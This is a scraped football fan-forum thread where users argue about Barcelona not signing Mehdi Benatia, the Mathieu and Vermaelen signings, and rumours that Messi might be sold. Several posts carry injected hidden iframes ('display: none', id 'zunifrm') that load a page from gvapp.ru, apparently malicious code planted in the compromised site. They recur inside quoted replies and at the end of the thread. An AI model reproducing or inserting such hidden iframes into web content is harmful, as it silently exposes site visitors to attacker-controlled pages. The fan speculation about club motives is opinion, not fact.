Mehdi Benatia

F

Flavia

Sorry if I got you wrong but you said ''Messi was almost sold this summer to fund the new stadium''. Maybe there was a misunderstanding.

Well, I believe that almost happened. He was under heavy criticism last season, for not running, thinking about the wc, many were complaining, and it wasn't only here on bf. And don't forget Faus, and his problem with taxes.<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

L

linetty

And that is a good thing? He cost us dearly on quite a few occasions didn't he?
That is not a good thing, but that is reality.

Benatia not coming should not worry anyone then. We have won a CL with Mascherano.

Hamzah

High Definition Member
There is no 'good enough' for a team like Barca. There is only 'the best', and Mathieu and Vermaelen, as good as they might turn out to be, are far from the best.

that applies for the attack and midfield for me because we have a philosophy of attacking football, but the defense not so much as long as they do the job and contribute to the possession game.

remember benatia is only cheap now because it's late in the window, he wants out and only bayern are interested (they are not even desperate). we wanted our cb's at the start of the window. we were desperate for a cb, this meant he would have cost us alot of money and priced us out of certain signings.

the fact is that our current personnel is good enough, they fit the style and we have two cb's which means depth. all that remains is lucho to do his job.

JamDav1982

Well, I believe that almost happened. He was under heavy criticism last season, for not running, thinking about the wc, many were complaining, and it wasn't only here on bf. And don't forget Faus, and his problem with taxes.<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

There is a huge difference from Messi being sold because he is unhappy and Messi being sold because they want to fund a new stadium.

They did everything they could to make Messi happy again and STOP him wanting to leave.

NotInHere

Come on guys, you guys are sounding like Real madrid, buy buy every top world class player!!

When in reality we have many world class players but you guys still find reasons to complain. we will be competitive with this squad.

KingMessi

SiempreBlaugrana
Mathieu and Vermaelen are temporary solutions to our defensive problems. They will act as stopgaps, and the club will be able to pursue somebody like Laporte or whoever the new big name talent is at a later date. And this also allows a chance for our own defensive talents to enter the squad and have a realistic chance of fighting for a spot in the team.

Hamzah

High Definition Member
Hahahahaaaaaaaa. Im dying here :lol:

don't you get his point? with proper pressing and tactics our defence was solid and won the champions league even with masch back there. now imagine how we'd get on with mathieu who is an actual cb and very good (assuming lucho sorts out everything else). we will also have better depth in those positions than in 2011. so the defence is good enough after this window's signings.

The only reason we did not go for benatia is we thought we could sign Marquinhos. Marquinhos+Mathieu was the plan but we all know how that ended.

Probably. We should have bought Benatia instead of wasting our time with Marquinhos. Or instead of buying Vermaelen. Benatia + Mathieu would have been really good. But I'd even have taken him instead of Mathieu.

What's the consensus on the fee?

Hamzah

High Definition Member
Probably. We should have bought Benatia instead of wasting our time with Marquinhos. Or instead of buying Vermaelen. Benatia + Mathieu would have been really good. But I'd even have taken him instead of Mathieu.

What's the consensus on the fee?

benatia at that point in time would have cost much more than 30m and priced us out of other signings.

L

linetty

don't you get his point? With proper pressing and tactics our defence was solid and won the champions league even with masch back there. Now imagine how we'd get on with mathieu who is an actual cb and very good (assuming lucho sorts out everything else). We will also have better depth in those positions than in 2011. So the defence is good enough after this window's signings.
Thank you!

Alarcón

That is not a good thing, but that is reality.

Benatia not coming should not worry anyone then. We have won a CL with Mascherano.

We have won a CL with Oleguer too. Does that mean our full backs don't have to be better than Oleguer. Winning a CL doesn't make your team perfect.

F

Flavia

There is a huge difference from Messi being sold because he is unhappy and Messi being sold because they want to fund a new stadium.

They did everything they could to make Messi happy again and STOP him wanting to leave.

Well, call me paranoid, but after the faus incident, to me it's not far fetched to imagine rosell wanting to make Messi unhappy on purpose, to get a good sum for the stadium or himself, and to make neymar the biggest star of the team. And I forgot to mention, but I don't think they'd ever say they'd sell Messi to fund the new stadium, the excuse would be something else. But after rosell resigned, and Barto took over, things changed in the following months. Also, Neymar injured and not really shining as they wanted, all the problems with his signing... It's somewhat a conspiracy theory, I know that. But rosell did want nike's neyney to be the star. That's why I think there's plenty substance to those rumors. Unlike you, I never trusted rosell for 1 second.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Home of Barca Fans